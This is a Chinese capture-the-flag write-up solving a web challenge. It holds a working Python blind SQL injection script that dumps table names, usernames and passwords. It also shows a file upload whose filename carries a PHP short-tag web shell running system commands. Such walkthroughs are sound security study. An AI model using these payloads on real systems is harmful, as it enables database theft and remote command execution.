[CISCN2019 总决赛 Day2 Web1]Easyweb

sql绕过

文件上传短标签绕过

信息收集

/robots.txt

User-agent: *
Disallow: *.php.bak

index.php

user.php

image.php

其中image.php.bak存在

在其中又发现config.php

/.DS_Store

没东西

image.php.bak

<?php
include "config.php";

$id=isset($_GET["id"])?$_GET["id"]:"1";
$path=isset($_GET["path"])?$_GET["path"]:"";

$id=addslashes($id);
$path=addslashes($path);

$id=str_replace(array("\\0","%00","\\'","'"),"",$id);
$path=str_replace(array("\\0","%00","\\'","'"),"",$path);

$result=mysqli_query($con,"select * from images where id='{$id}' or path='{$path}'");
$row=mysqli_fetch_array($result,MYSQLI_ASSOC);

$path="./" . $row["path"];
header("Content-Type: image/jpeg");
readfile($path);

绕过：（这里不知道为啥必须要%23而#不行，好像是#号url不会解析）

id=\0&path= or 1=1 %23
id=\0&path= or sleep(5) %23

<?php

$id=isset($_GET["id"])?$_GET["id"]:"1";
$path=isset($_GET["path"])?$_GET["path"]:"";

输入：id=\0&path=%20or%201%23

$id=addslashes($id);
$path=addslashes($path);
print($id);
echo "<br>";

输出：\\0

$id=str_replace(array("\\0","%00","\\'","'"),"",$id);
$path=str_replace(array("\\0","%00","\\'","'"),"",$path);

print($id);
echo "<br>";

输出：\

$result="select * from images where id='{$id}' or path='{$path}'";


$path="./" . $row["path"];


print($result);

输出：select * from images where id='\' or path=' or 1#'

上脚本

import  requests
url = "http://57d910cf-b223-4831-ac2c-3090cb6551d2.node4.buuoj.cn:81/image.php"

#查表 
payload1="?id=\\0&path=or ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))>{}%23"
#查列 
payload2="?id=\\0&path=or ascii(substr((select group_concat(column_name) from information_schema.columns where table_name=0x7573657273),{},1))>{}%23"
#查用户名
payload3="?id=\\0&path=or ascii(substr((select group_concat(username) from users),{},1))>{}%23"
#查密码
payload4="?id=\\0&path=or ascii(substr((select group_concat(password) from users),{},1))>{}%23"

result=""

for i in range(1, 10000):
    low = 32
    high = 128
    mid = (low + high) >> 1

    while (low < high):
        #payload = payload1.format(i, mid)  # images,users
        #payload = payload2.format(i, mid)  # username, password
        #payload = payload3.format(i, mid)  # admin
        payload = payload4.format(i, mid)   # dc268983c380339547ce
        new_url = url + payload

        response = requests.get(new_url)
        if "JFIF" in response.text:
            low = mid + 1
        else:
            high = mid
        
        mid = (low + high) >> 1
    if (mid == 32 or mid == 132):
        break
    result += chr(mid)
    print(result)

得出用户admin

密码（每次重建环境会换）

在PHP的配置文件（php.ini）中有一个short_open_tag的值，开启以后可以使用PHP的短标签：

开启短标签之后除了<?php ?>，可使用更灵活的调用方法
<? /*程序操作*/ ?>
<?=/*函数*/?>

抓包修改上传的filename为<?=@system($_GET[a]);?>.phtml，注意别把引号给搞没了就行。成功后走一个cat /flag

ok'